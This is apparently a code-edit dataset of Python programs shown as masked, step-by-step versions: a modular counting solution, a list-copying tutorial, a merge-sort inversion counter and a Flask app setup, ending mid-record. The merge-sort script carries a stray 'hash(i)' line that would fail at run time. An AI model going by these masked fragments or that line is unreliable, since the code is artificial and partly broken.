for ai, bi in A_B:
if ai == INF:
comb_dict[0][1] += 1
elif bi == INF:
comb_dict[0][0] += 1
elif bi < 0:
comb_dict[ai, bi][0] += 1
else:
comb_dict[bi, -ai][1] += 1
ret = 1
for _, val_list in comb_dict.items():
a, b = val_list
if a == 0 or b == 0:
ret *= pow(2, max(a, b), mod)
else:
ret *= pow(2, a, mod) + pow(2, b, mod) - 1
ret %= mod
ret += zerozero - 1
print(ret % mod)
if __name__ == '__main__':
run()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
sysread = sys.stdin.readline
read = sys.stdin.read
<|reserved_special_token_0|>
sys.setrecursionlimit(10 ** 7)
<|reserved_special_token_0|>
def run():
mod = 1000000007
N, *AB = map(int, read().split())
A_B = []
INF = float('inf')
zerozero = 0
for i in range(N):
a = AB[2 * i]
b = AB[2 * i + 1]
if a == 0 and b == 0:
zerozero += 1
elif b == 0:
A_B.append((INF, 0))
elif a == 0:
A_B.append((0, INF))
else:
tmp = math.gcd(a, b)
if a / b > 0:
v = 1
else:
v = -1
A_B.append((abs(a // tmp), v * abs(b // tmp)))
comb_dict = defaultdict(lambda : [0, 0])
for ai, bi in A_B:
if ai == INF:
comb_dict[0][1] += 1
elif bi == INF:
comb_dict[0][0] += 1
elif bi < 0:
comb_dict[ai, bi][0] += 1
else:
comb_dict[bi, -ai][1] += 1
ret = 1
for _, val_list in comb_dict.items():
a, b = val_list
if a == 0 or b == 0:
ret *= pow(2, max(a, b), mod)
else:
ret *= pow(2, a, mod) + pow(2, b, mod) - 1
ret %= mod
ret += zerozero - 1
print(ret % mod)
if __name__ == '__main__':
run()
<|reserved_special_token_1|>
import sys
sysread = sys.stdin.readline
read = sys.stdin.read
from heapq import heappop, heappush
from collections import defaultdict
sys.setrecursionlimit(10 ** 7)
import math
def run():
mod = 1000000007
N, *AB = map(int, read().split())
A_B = []
INF = float('inf')
zerozero = 0
for i in range(N):
a = AB[2 * i]
b = AB[2 * i + 1]
if a == 0 and b == 0:
zerozero += 1
elif b == 0:
A_B.append((INF, 0))
elif a == 0:
A_B.append((0, INF))
else:
tmp = math.gcd(a, b)
if a / b > 0:
v = 1
else:
v = -1
A_B.append((abs(a // tmp), v * abs(b // tmp)))
comb_dict = defaultdict(lambda : [0, 0])
for ai, bi in A_B:
if ai == INF:
comb_dict[0][1] += 1
elif bi == INF:
comb_dict[0][0] += 1
elif bi < 0:
comb_dict[ai, bi][0] += 1
else:
comb_dict[bi, -ai][1] += 1
ret = 1
for _, val_list in comb_dict.items():
a, b = val_list
if a == 0 or b == 0:
ret *= pow(2, max(a, b), mod)
else:
ret *= pow(2, a, mod) + pow(2, b, mod) - 1
ret %= mod
ret += zerozero - 1
print(ret % mod)
if __name__ == '__main__':
run()
<|reserved_special_token_1|>
# coding: utf-8
import sys
#from operator import itemgetter
sysread = sys.stdin.readline
read = sys.stdin.read
from heapq import heappop, heappush
from collections import defaultdict
sys.setrecursionlimit(10**7)
import math
#from itertools import product#accumulate, combinations, product
#import bisect# lower_bound etc
#import numpy as np
#from copy import deepcopy
def run():
mod = 1000000007
N, *AB = map(int, read().split())
A_B = []
INF = float('inf')
zerozero = 0
for i in range(N):
a = AB[2*i]
b = AB[2*i+1]
if a== 0 and b == 0:
zerozero += 1
elif b == 0:
A_B.append((INF, 0))
elif a == 0:
A_B.append((0, INF))
else:
tmp = math.gcd(a,b)
            if a / b > 0:
                v = 1
            else:
                v = -1
A_B.append((abs(a//tmp), v * abs(b//tmp)))
comb_dict = defaultdict(lambda:[0,0])
for ai, bi in A_B:
if ai == INF:
comb_dict[0][1] += 1
elif bi == INF:
comb_dict[0][0] += 1
elif bi < 0:
comb_dict[(ai,bi)][0] += 1
else:
comb_dict[(bi, -ai)][1] += 1
ret = 1
for _, val_list in comb_dict.items():
a,b = val_list
if a == 0 or b == 0:
ret *= pow(2, max(a,b), mod)
else:
ret *= pow(2, a, mod) + pow(2, b, mod) - 1
ret %= mod
ret += zerozero-1
print(ret%mod)
if __name__ == "__main__":
run()
|
flexible
|
{
"blob_id": "f73a3bd7665ac9cc90085fcac2530c93bef69d3d",
"index": 6705,
"step-1": "<mask token>\n\n\ndef run():\n mod = 1000000007\n N, *AB = map(int, read().split())\n A_B = []\n INF = float('inf')\n zerozero = 0\n for i in range(N):\n a = AB[2 * i]\n b = AB[2 * i + 1]\n if a == 0 and b == 0:\n zerozero += 1\n elif b == 0:\n A_B.append((INF, 0))\n elif a == 0:\n A_B.append((0, INF))\n else:\n tmp = math.gcd(a, b)\n if a / b > 0:\n v = 1\n else:\n v = -1\n A_B.append((abs(a // tmp), v * abs(b // tmp)))\n comb_dict = defaultdict(lambda : [0, 0])\n for ai, bi in A_B:\n if ai == INF:\n comb_dict[0][1] += 1\n elif bi == INF:\n comb_dict[0][0] += 1\n elif bi < 0:\n comb_dict[ai, bi][0] += 1\n else:\n comb_dict[bi, -ai][1] += 1\n ret = 1\n for _, val_list in comb_dict.items():\n a, b = val_list\n if a == 0 or b == 0:\n ret *= pow(2, max(a, b), mod)\n else:\n ret *= pow(2, a, mod) + pow(2, b, mod) - 1\n ret %= mod\n ret += zerozero - 1\n print(ret % mod)\n\n\n<mask token>\n",
"step-2": "<mask token>\nsys.setrecursionlimit(10 ** 7)\n<mask token>\n\n\ndef run():\n mod = 1000000007\n N, *AB = map(int, read().split())\n A_B = []\n INF = float('inf')\n zerozero = 0\n for i in range(N):\n a = AB[2 * i]\n b = AB[2 * i + 1]\n if a == 0 and b == 0:\n zerozero += 1\n elif b == 0:\n A_B.append((INF, 0))\n elif a == 0:\n A_B.append((0, INF))\n else:\n tmp = math.gcd(a, b)\n if a / b > 0:\n v = 1\n else:\n v = -1\n A_B.append((abs(a // tmp), v * abs(b // tmp)))\n comb_dict = defaultdict(lambda : [0, 0])\n for ai, bi in A_B:\n if ai == INF:\n comb_dict[0][1] += 1\n elif bi == INF:\n comb_dict[0][0] += 1\n elif bi < 0:\n comb_dict[ai, bi][0] += 1\n else:\n comb_dict[bi, -ai][1] += 1\n ret = 1\n for _, val_list in comb_dict.items():\n a, b = val_list\n if a == 0 or b == 0:\n ret *= pow(2, max(a, b), mod)\n else:\n ret *= pow(2, a, mod) + pow(2, b, mod) - 1\n ret %= mod\n ret += zerozero - 1\n print(ret % mod)\n\n\nif __name__ == '__main__':\n run()\n",
"step-3": "<mask token>\nsysread = sys.stdin.readline\nread = sys.stdin.read\n<mask token>\nsys.setrecursionlimit(10 ** 7)\n<mask token>\n\n\ndef run():\n mod = 1000000007\n N, *AB = map(int, read().split())\n A_B = []\n INF = float('inf')\n zerozero = 0\n for i in range(N):\n a = AB[2 * i]\n b = AB[2 * i + 1]\n if a == 0 and b == 0:\n zerozero += 1\n elif b == 0:\n A_B.append((INF, 0))\n elif a == 0:\n A_B.append((0, INF))\n else:\n tmp = math.gcd(a, b)\n if a / b > 0:\n v = 1\n else:\n v = -1\n A_B.append((abs(a // tmp), v * abs(b // tmp)))\n comb_dict = defaultdict(lambda : [0, 0])\n for ai, bi in A_B:\n if ai == INF:\n comb_dict[0][1] += 1\n elif bi == INF:\n comb_dict[0][0] += 1\n elif bi < 0:\n comb_dict[ai, bi][0] += 1\n else:\n comb_dict[bi, -ai][1] += 1\n ret = 1\n for _, val_list in comb_dict.items():\n a, b = val_list\n if a == 0 or b == 0:\n ret *= pow(2, max(a, b), mod)\n else:\n ret *= pow(2, a, mod) + pow(2, b, mod) - 1\n ret %= mod\n ret += zerozero - 1\n print(ret % mod)\n\n\nif __name__ == '__main__':\n run()\n",
"step-4": "import sys\nsysread = sys.stdin.readline\nread = sys.stdin.read\nfrom heapq import heappop, heappush\nfrom collections import defaultdict\nsys.setrecursionlimit(10 ** 7)\nimport math\n\n\ndef run():\n mod = 1000000007\n N, *AB = map(int, read().split())\n A_B = []\n INF = float('inf')\n zerozero = 0\n for i in range(N):\n a = AB[2 * i]\n b = AB[2 * i + 1]\n if a == 0 and b == 0:\n zerozero += 1\n elif b == 0:\n A_B.append((INF, 0))\n elif a == 0:\n A_B.append((0, INF))\n else:\n tmp = math.gcd(a, b)\n if a / b > 0:\n v = 1\n else:\n v = -1\n A_B.append((abs(a // tmp), v * abs(b // tmp)))\n comb_dict = defaultdict(lambda : [0, 0])\n for ai, bi in A_B:\n if ai == INF:\n comb_dict[0][1] += 1\n elif bi == INF:\n comb_dict[0][0] += 1\n elif bi < 0:\n comb_dict[ai, bi][0] += 1\n else:\n comb_dict[bi, -ai][1] += 1\n ret = 1\n for _, val_list in comb_dict.items():\n a, b = val_list\n if a == 0 or b == 0:\n ret *= pow(2, max(a, b), mod)\n else:\n ret *= pow(2, a, mod) + pow(2, b, mod) - 1\n ret %= mod\n ret += zerozero - 1\n print(ret % mod)\n\n\nif __name__ == '__main__':\n run()\n",
"step-5": "# coding: utf-8\nimport sys\n#from operator import itemgetter\nsysread = sys.stdin.readline\nread = sys.stdin.read\nfrom heapq import heappop, heappush\nfrom collections import defaultdict\nsys.setrecursionlimit(10**7)\nimport math\n#from itertools import product#accumulate, combinations, product\n#import bisect# lower_bound etc\n#import numpy as np\n#from copy import deepcopy\ndef run():\n mod = 1000000007\n N, *AB = map(int, read().split())\n A_B = []\n INF = float('inf')\n zerozero = 0\n for i in range(N):\n a = AB[2*i]\n b = AB[2*i+1]\n if a== 0 and b == 0:\n zerozero += 1\n elif b == 0:\n A_B.append((INF, 0))\n elif a == 0:\n A_B.append((0, INF))\n else:\n tmp = math.gcd(a,b)\n if a / b > 0 :v = 1\n else: v = -1\n A_B.append((abs(a//tmp), v * abs(b//tmp)))\n\n comb_dict = defaultdict(lambda:[0,0])\n\n for ai, bi in A_B:\n if ai == INF:\n comb_dict[0][1] += 1\n elif bi == INF:\n comb_dict[0][0] += 1\n elif bi < 0:\n comb_dict[(ai,bi)][0] += 1\n else:\n comb_dict[(bi, -ai)][1] += 1\n\n ret = 1\n for _, val_list in comb_dict.items():\n a,b = val_list\n if a == 0 or b == 0:\n ret *= pow(2, max(a,b), mod)\n else:\n ret *= pow(2, a, mod) + pow(2, b, mod) - 1\n ret %= mod\n ret += zerozero-1\n print(ret%mod)\n\n\n\nif __name__ == \"__main__\":\n run()",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
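
run() above normalizes each nonzero (a, b) by its gcd and a sign convention, so two vectors conflict (zero dot product) exactly when they land in the same dictionary key on opposite sides; each key with side counts (x, y) then contributes a factor of 2^x + 2^y - 1. A brute-force sanity check of that factor: a valid selection may draw from only one side, and the empty pick is shared between the two terms, hence the -1:

from itertools import product

def valid_choices(x, y):
    # Count 0/1 pick vectors over x "left" and y "right" items that never
    # take from both sides at once (the two sides are mutually conflicting).
    total = 0
    for pick in product([0, 1], repeat=x + y):
        if not (any(pick[:x]) and any(pick[x:])):
            total += 1
    return total

for x, y in [(1, 1), (2, 1), (2, 3)]:
    assert valid_choices(x, y) == 2 ** x + 2 ** y - 1
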
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(name[0], name[2])
print(name[1:3])
print(name[:3])
print(name[0:3])
print(name[-2:])
name.append('666')
name.insert(1, '999')
print(name)
<|reserved_special_token_0|>
print(name)
name.pop()
print(name)
name.pop(2)
print(name)
print(name.index('999'))
name.reverse()
print(name)
name.sort()
print(name)
<|reserved_special_token_0|>
print(name2)
<|reserved_special_token_0|>
print(names)
<|reserved_special_token_0|>
print('name3:', names3)
<|reserved_special_token_0|>
print(names)
print(names1)
print(names2)
for i in names2:
print(i)
print(name[0:-1:2])
print(name[::2])
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
name = ['111', '222', '333', '444', '555']
print(name[0], name[2])
print(name[1:3])
print(name[:3])
print(name[0:3])
print(name[-2:])
name.append('666')
name.insert(1, '999')
print(name)
name[0] = '000'
print(name)
name.pop()
print(name)
name.pop(2)
print(name)
print(name.index('999'))
name.reverse()
print(name)
name.sort()
print(name)
name2 = name.copy()
print(name2)
name[1] = 'xxx'
names = ['1', [1, 2], '2']
names[1][0] = 9
print(names)
names1 = copy.copy(names)
names3 = name[:]
print('name3:', names3)
names2 = copy.deepcopy(names)
names[1][1] = 3
print(names)
print(names1)
print(names2)
for i in names2:
print(i)
print(name[0:-1:2])
print(name[::2])
<|reserved_special_token_0|>
<|reserved_special_token_1|>
import copy
name = ['111', '222', '333', '444', '555']
print(name[0], name[2])
print(name[1:3])
print(name[:3])
print(name[0:3])
print(name[-2:])
name.append('666')
name.insert(1, '999')
print(name)
name[0] = '000'
print(name)
name.pop()
print(name)
name.pop(2)
print(name)
print(name.index('999'))
name.reverse()
print(name)
name.sort()
print(name)
name2 = name.copy()
print(name2)
name[1] = 'xxx'
names = ['1', [1, 2], '2']
names[1][0] = 9
print(names)
names1 = copy.copy(names)
names3 = name[:]
print('name3:', names3)
names2 = copy.deepcopy(names)
names[1][1] = 3
print(names)
print(names1)
print(names2)
for i in names2:
print(i)
print(name[0:-1:2])
print(name[::2])
<|reserved_special_token_0|>
<|reserved_special_token_1|>
# Author: Charse
# Using Python lists
import copy
name = ["111", "222", "333", "444", "555"]
# Reading elements from the list
print(name[0], name[2]) # 111 333
print(name[1:3]) # slice: ['222', '333']
print(name[:3]) # ['111', '222', '333'], same as starting the slice at index 0
print(name[0:3]) # ['111', '222', '333']
print(name[-2:]) # ['444', '555'], the last two elements of name
# Adding elements to the list
name.append("666") # append at the end
name.insert(1, "999") # insert at a position: "999" goes to index 1, later elements shift right
print(name)
# Modifying an element
name[0] = "000"
print(name)
# Removing elements
name.pop() # with no argument, removes the last element
print(name)
name.pop(2)
print(name)
# Finding the index of a given element
print(name.index("999"))
# Reverse the list in place
name.reverse()
print(name)
# Sort in place; order is special characters, digits, uppercase, then lowercase
name.sort()
print(name)
# name.clear() removes all items
# Copying the list
name2 = name.copy() # shallow copy: a nested list is shared, so edits to it show up in the copy too
print(name2)
name[1] = "xxx" # name2 is not affected by this top-level change
names = ["1", [1, 2], "2"]
names[1][0] = 9
print(names)
names1 = copy.copy(names) # shallow copy, same as list.copy(): only the references are copied
names3 = name[:]
print("name3:", names3)
# Deep copy
names2 = copy.deepcopy(names)
# Mutating the nested element changes names and names1 alike,
# but the nested list inside names2 is untouched
names[1][1] = 3
print(names)
print(names1)
print(names2)
# Iterating over the list
for i in names2:
    print(i)
# Strided printing: from index 0 to the end, step 2
print(name[0:-1:2])
# the 0 and -1 can be omitted (note that [::2] also includes the last element)
print(name[::2])
'''
Shallow vs. deep copy
'''
|
flexible
|
{
"blob_id": "d517c1e2eb4d37a2584f1603c704efce6834df92",
"index": 7443,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(name[0], name[2])\nprint(name[1:3])\nprint(name[:3])\nprint(name[0:3])\nprint(name[-2:])\nname.append('666')\nname.insert(1, '999')\nprint(name)\n<mask token>\nprint(name)\nname.pop()\nprint(name)\nname.pop(2)\nprint(name)\nprint(name.index('999'))\nname.reverse()\nprint(name)\nname.sort()\nprint(name)\n<mask token>\nprint(name2)\n<mask token>\nprint(names)\n<mask token>\nprint('name3:', names3)\n<mask token>\nprint(names)\nprint(names1)\nprint(names2)\nfor i in names2:\n print(i)\nprint(name[0:-1:2])\nprint(name[::2])\n<mask token>\n",
"step-3": "<mask token>\nname = ['111', '222', '333', '444', '555']\nprint(name[0], name[2])\nprint(name[1:3])\nprint(name[:3])\nprint(name[0:3])\nprint(name[-2:])\nname.append('666')\nname.insert(1, '999')\nprint(name)\nname[0] = '000'\nprint(name)\nname.pop()\nprint(name)\nname.pop(2)\nprint(name)\nprint(name.index('999'))\nname.reverse()\nprint(name)\nname.sort()\nprint(name)\nname2 = name.copy()\nprint(name2)\nname[1] = 'xxx'\nnames = ['1', [1, 2], '2']\nnames[1][0] = 9\nprint(names)\nnames1 = copy.copy(names)\nnames3 = name[:]\nprint('name3:', names3)\nnames2 = copy.deepcopy(names)\nnames[1][1] = 3\nprint(names)\nprint(names1)\nprint(names2)\nfor i in names2:\n print(i)\nprint(name[0:-1:2])\nprint(name[::2])\n<mask token>\n",
"step-4": "import copy\nname = ['111', '222', '333', '444', '555']\nprint(name[0], name[2])\nprint(name[1:3])\nprint(name[:3])\nprint(name[0:3])\nprint(name[-2:])\nname.append('666')\nname.insert(1, '999')\nprint(name)\nname[0] = '000'\nprint(name)\nname.pop()\nprint(name)\nname.pop(2)\nprint(name)\nprint(name.index('999'))\nname.reverse()\nprint(name)\nname.sort()\nprint(name)\nname2 = name.copy()\nprint(name2)\nname[1] = 'xxx'\nnames = ['1', [1, 2], '2']\nnames[1][0] = 9\nprint(names)\nnames1 = copy.copy(names)\nnames3 = name[:]\nprint('name3:', names3)\nnames2 = copy.deepcopy(names)\nnames[1][1] = 3\nprint(names)\nprint(names1)\nprint(names2)\nfor i in names2:\n print(i)\nprint(name[0:-1:2])\nprint(name[::2])\n<mask token>\n",
"step-5": "# Author: Charse\n# py 列表的使用\n\nimport copy\n\n\nname = [\"111\", \"222\", \"333\", \"444\", \"555\"]\n\n# 从列表中取得元素\nprint(name[0], name[2]) # 111 333\nprint(name[1:3]) # 切片 ['222', '333']\nprint(name[:3]) # ['111', '222', '333'] 与下标从0开始是一样的\nprint(name[0:3]) # ['111', '222', '333']\nprint(name[-2:]) # ['444', '555'] 与name\n\n# 往列表中添加元素\nname.append(\"666\") # 直接在末尾添加\nname.insert(1, \"999\") # 在指定位置插入 : 将999插入到下标为1的位置, 原来位置中元素就直接往后顺延\nprint(name)\n\n# 修改列表中元素\nname[0] = \"000\"\nprint(name)\n\n# 删除元素\nname.pop() # 默认是删除最后一个下标\nprint(name)\nname.pop(2)\nprint(name)\n\n# 取出指定元素的下标\nprint(name.index(\"999\"))\n\n# 反转 改变的是分组里面的元素\nname.reverse()\nprint(name)\n\n# 特殊字符, 数字, 大写字母, 小写字母排序. 改变的是数组中的元素\nname.sort()\nprint(name)\n\n# name.clear() remove all items 删除所有的元素\n\n# 复制列表\nname2 = name.copy() # 这个是浅copy,如果列表中还有列表,列表的中元素修改了,新的中也同样是修改了\nprint(name2)\nname[1] = \"xxx\" # name2中是不会进行修改的\n\nnames = [\"1\", [1, 2], \"2\"]\n\nnames[1][0] = 9\nprint(names)\n\nnames1 = copy.copy(names) # 这个是浅copy,与列表的copy是一样的.只是一个引用的copy\n\nnames3 = name[:]\n\nprint(\"name3:\", names3)\n\n\n# 进行深copy\nnames2 = copy.deepcopy(names)\n\n# 对列表的元素进行修改,两者是同样的被修改\n# names2 元素内的列表是不会被修改的\nnames[1][1] = 3\n\nprint(names)\nprint(names1)\nprint(names2)\n\n# 遍历列表\nfor i in names2:\n print(i)\n\n\n\n# 跳跃打印: 从0 开始打印, 到末尾, 步长为2\nprint(name[0:-1:2])\n# 0, -1可以进行省略\nprint(name[::2])\n\n\n'''\n深浅copy\n\n\n'''\n\n\n\n\n\n\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
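The record above exercises list indexing, slicing, mutation, and the difference between shallow and deep copies. As a supplement, here is a minimal self-contained sketch (not part of the record; the variable names are illustrative) that isolates the behaviour the example is built around: a shallow copy shares nested lists, a deep copy does not.

import copy

outer = ['a', [1, 2], 'b']
shallow = copy.copy(outer)    # new outer list, but the inner [1, 2] is shared
deep = copy.deepcopy(outer)   # recursively copies the inner list as well
outer[1][0] = 99
print(shallow[1])             # [99, 2] -- the mutation shows through the shared inner list
print(deep[1])                # [1, 2]  -- the deep copy is unaffected
print(shallow[1] is outer[1], deep[1] is outer[1])  # True False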
count = 0
def merge(a, b):
    # merge two sorted lists while counting inversions across the split
    global count
    c = []
    h = j = 0
    while j < len(a) and h < len(b):
        if a[j] <= b[h]:
            c.append(a[j])
            j += 1
        else:
            # b[h] precedes every element still pending in a, so each of
            # those len(a) - j pairs is one inversion
            count += len(a[j:])
            c.append(b[h])
            h += 1
    if j == len(a):
        for i in b[h:]:
            c.append(i)
    else:
        for i in a[j:]:
            c.append(i)
    return c
def merge_sort(lists):
    if len(lists) <= 1:
        return lists
    middle = len(lists) // 2
    left = merge_sort(lists[:middle])
    right = merge_sort(lists[middle:])
    return merge(left, right)
if __name__ == '__main__':
    a = [7, 6, 5, 9, 10, 11]
    print(merge_sort(a))
    print(count)
|
normal
|
{
"blob_id": "cf3b66a635c6549553af738f263b035217e75a7a",
"index": 903,
"step-1": "<mask token>\n\n\ndef merge_sort(lists):\n if len(lists) <= 1:\n return lists\n middle = len(lists) // 2\n left = merge_sort(lists[:middle])\n right = merge_sort(lists[middle:])\n return merge(left, right)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef merge(a, b):\n global count\n c = []\n h = j = 0\n while j < len(a) and h < len(b):\n if a[j] <= b[h]:\n c.append(a[j])\n j += 1\n else:\n count += len(a[j:])\n c.append(b[h])\n h += 1\n if j == len(a):\n for i in b[h:]:\n c.append(i)\n else:\n for i in a[j:]:\n c.append(i)\n return c\n\n\ndef merge_sort(lists):\n if len(lists) <= 1:\n return lists\n middle = len(lists) // 2\n left = merge_sort(lists[:middle])\n right = merge_sort(lists[middle:])\n return merge(left, right)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef merge(a, b):\n global count\n c = []\n h = j = 0\n while j < len(a) and h < len(b):\n if a[j] <= b[h]:\n c.append(a[j])\n j += 1\n else:\n count += len(a[j:])\n c.append(b[h])\n h += 1\n if j == len(a):\n for i in b[h:]:\n c.append(i)\n else:\n for i in a[j:]:\n c.append(i)\n return c\n\n\ndef merge_sort(lists):\n if len(lists) <= 1:\n return lists\n middle = len(lists) // 2\n left = merge_sort(lists[:middle])\n right = merge_sort(lists[middle:])\n return merge(left, right)\n\n\nif __name__ == '__main__':\n a = [7, 6, 5, 9, 10, 11]\n print(merge_sort(a))\n print(count)\n hash(i)\n",
"step-4": "count = 0\n\n\ndef merge(a, b):\n global count\n c = []\n h = j = 0\n while j < len(a) and h < len(b):\n if a[j] <= b[h]:\n c.append(a[j])\n j += 1\n else:\n count += len(a[j:])\n c.append(b[h])\n h += 1\n if j == len(a):\n for i in b[h:]:\n c.append(i)\n else:\n for i in a[j:]:\n c.append(i)\n return c\n\n\ndef merge_sort(lists):\n if len(lists) <= 1:\n return lists\n middle = len(lists) // 2\n left = merge_sort(lists[:middle])\n right = merge_sort(lists[middle:])\n return merge(left, right)\n\n\nif __name__ == '__main__':\n a = [7, 6, 5, 9, 10, 11]\n print(merge_sort(a))\n print(count)\n hash(i)\n",
"step-5": "count=0\ndef merge(a, b):\n global count\n c = []\n h = j = 0\n while j < len(a) and h < len(b):\n if a[j] <= b[h]:\n c.append(a[j])\n j += 1\n else:\n count+=(len(a[j:]))\n c.append(b[h])\n h += 1\n\n if j == len(a):\n for i in b[h:]:\n c.append(i)\n else:\n for i in a[j:]:\n c.append(i)\n # count += h+1\n\n return c\n\ndef merge_sort(lists):\n if len(lists) <= 1:\n return lists\n middle = len(lists)//2\n left = merge_sort(lists[:middle])\n right = merge_sort(lists[middle:])\n return merge(left, right)\n\n\nif __name__ == '__main__':\n a = [7, 6, 5,9, 10, 11]\n print(merge_sort(a))\n print(count)\n hash(i)",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
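The merge() in the record above piggybacks inversion counting on merge sort: whenever an element of the right half is emitted first, every element still pending in the left half forms an inversion with it. A quick way to sanity-check that logic is the quadratic reference count below; this sketch is illustrative and not part of the record.

from itertools import combinations

def count_inversions_naive(xs):
    # an inversion is a pair (i, j) with i < j and xs[i] > xs[j]
    return sum(1 for x, y in combinations(xs, 2) if x > y)

print(count_inversions_naive([7, 6, 5, 9, 10, 11]))  # 3, matching the merge-based count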
#!/usr/bin/env python
#coding=utf-8
"""
__init__.py
:license: BSD, see LICENSE for more details.
"""
import os
import logging
import sys
from logging.handlers import SMTPHandler, RotatingFileHandler
from flask import Flask, g, session, request, flash, redirect, jsonify, url_for
from flaskext.babel import Babel
from bg import helpers
from bg.extensions import db, mail, cache, photos, identity_changed, Identity
from bg.views import frontend,admin,post,account
from bg.models import Post
DEFAULT_MODULES = (
(frontend, ""),
(post, "/post"),
(account, "/account"),
(admin, "/admin"),)
DEFAULT_APP_NAME = 'bg'
def create_app(config=None, modules=None):
if modules is None:
modules = DEFAULT_MODULES
app = Flask(DEFAULT_APP_NAME)
#config
app.config.from_pyfile(config)
configure_extensions(app)
configure_logging(app)
configure_errorhandlers(app)
configure_before_handlers(app)
configure_template_filters(app)
configure_context_processors(app)
configure_signals(app)
babel = Babel(app)
# register module
configure_modules(app, modules)
return app
def on_identity_changed(app, identity):
g.identity = identity
session['identity'] = identity
def configure_signals(app):
identity_changed.connect(on_identity_changed, app)
def configure_errorhandlers(app):
@app.errorhandler(401)
def unauthorized(error):
#if request.is_xhr:
# return jsonfiy(error=_("Login required"))
flash(("Please login to see this page"), "error")
#return redirect(url_for("account.login", next=request.path))
return redirect(url_for("account.login"))
def configure_before_handlers(app):
@app.before_request
def authenticate():
try:
g.identity = session['identity']
except Exception:
g.identity = Identity(0,'Login')
def configure_extensions(app):
# configure extensions
db.init_app(app)
#db.app = app
#db.create_all()
mail.init_app(app)
cache.init_app(app)
#setup_themes(app)
def configure_context_processors(app):
@app.context_processor
def archives():
archives = set()
for dt in Post.query.from_self(Post.create_date).order_by().filter_by(author_id=g.identity.id):
item = (dt.create_date.year, dt.create_date.month)
archives.add(item)
if len(archives) > 5:
break
archives = sorted(list(archives))
return dict(archives=archives)
def configure_modules(app, modules):
for module, url_prefix in modules:
app.register_module(module, url_prefix=url_prefix)
def configure_template_filters(app):
@app.template_filter()
def timesince(value):
return helpers.timesince(value)
@app.template_filter()
def endtags(value):
return helpers.endtags(value)
@app.template_filter()
def gravatar(email,size):
return helpers.gravatar(email,size)
@app.template_filter()
def format_date(date,s='full'):
return helpers.format_date(date,s)
@app.template_filter()
def format_datetime(time,s='full'):
return helpers.format_datetime(time,s)
@app.template_filter()
def format_yearmonth(date):
return '%s-%s'%date
def configure_logging(app):
mail_handler = \
SMTPHandler(app.config['MAIL_SERVER'],
app.config['DEFAULT_MAIL_SENDER'],
app.config['ADMINS'],
'application error',
(
app.config['MAIL_USERNAME'],
app.config['MAIL_PASSWORD'],
))
mail_handler.setLevel(logging.ERROR)
app.logger.addHandler(mail_handler)
formatter = logging.Formatter(
'%(asctime)s %(levelname)s: %(message)s '
'[in %(pathname)s:%(lineno)d]')
debug_log = os.path.join(app.root_path,
app.config['DEBUG_LOG'])
debug_file_handler = \
RotatingFileHandler(debug_log,
maxBytes=100000,
backupCount=10)
debug_file_handler.setLevel(logging.DEBUG)
debug_file_handler.setFormatter(formatter)
app.logger.addHandler(debug_file_handler)
error_log = os.path.join(app.root_path,
app.config['ERROR_LOG'])
error_file_handler = \
RotatingFileHandler(error_log,
maxBytes=100000,
backupCount=10)
error_file_handler.setLevel(logging.ERROR)
error_file_handler.setFormatter(formatter)
app.logger.addHandler(error_file_handler)
|
normal
|
{
"blob_id": "ef124e8c15ef347efd709a5e3fb104c7fd1bccde",
"index": 2753,
"step-1": "<mask token>\n\n\ndef on_identity_changed(app, identity):\n g.identity = identity\n session['identity'] = identity\n\n\ndef configure_signals(app):\n identity_changed.connect(on_identity_changed, app)\n\n\n<mask token>\n\n\ndef configure_before_handlers(app):\n\n @app.before_request\n def authenticate():\n try:\n g.identity = session['identity']\n except Exception:\n g.identity = Identity(0, 'Login')\n\n\ndef configure_extensions(app):\n db.init_app(app)\n mail.init_app(app)\n cache.init_app(app)\n\n\ndef configure_context_processors(app):\n\n @app.context_processor\n def archives():\n archives = set()\n for dt in Post.query.from_self(Post.create_date).order_by().filter_by(\n author_id=g.identity.id):\n item = dt.create_date.year, dt.create_date.month\n archives.add(item)\n if len(archives) > 5:\n break\n archives = sorted(list(archives))\n return dict(archives=archives)\n\n\ndef configure_modules(app, modules):\n for module, url_prefix in modules:\n app.register_module(module, url_prefix=url_prefix)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef create_app(config=None, modules=None):\n if modules is None:\n modules = DEFAULT_MODULES\n app = Flask(DEFAULT_APP_NAME)\n app.config.from_pyfile(config)\n configure_extensions(app)\n configure_logging(app)\n configure_errorhandlers(app)\n configure_before_handlers(app)\n configure_template_filters(app)\n configure_context_processors(app)\n configure_signals(app)\n babel = Babel(app)\n configure_modules(app, modules)\n return app\n\n\ndef on_identity_changed(app, identity):\n g.identity = identity\n session['identity'] = identity\n\n\ndef configure_signals(app):\n identity_changed.connect(on_identity_changed, app)\n\n\ndef configure_errorhandlers(app):\n\n @app.errorhandler(401)\n def unauthorized(error):\n flash('Please login to see this page', 'error')\n return redirect(url_for('account.login'))\n\n\ndef configure_before_handlers(app):\n\n @app.before_request\n def authenticate():\n try:\n g.identity = session['identity']\n except Exception:\n g.identity = Identity(0, 'Login')\n\n\ndef configure_extensions(app):\n db.init_app(app)\n mail.init_app(app)\n cache.init_app(app)\n\n\ndef configure_context_processors(app):\n\n @app.context_processor\n def archives():\n archives = set()\n for dt in Post.query.from_self(Post.create_date).order_by().filter_by(\n author_id=g.identity.id):\n item = dt.create_date.year, dt.create_date.month\n archives.add(item)\n if len(archives) > 5:\n break\n archives = sorted(list(archives))\n return dict(archives=archives)\n\n\ndef configure_modules(app, modules):\n for module, url_prefix in modules:\n app.register_module(module, url_prefix=url_prefix)\n\n\n<mask token>\n",
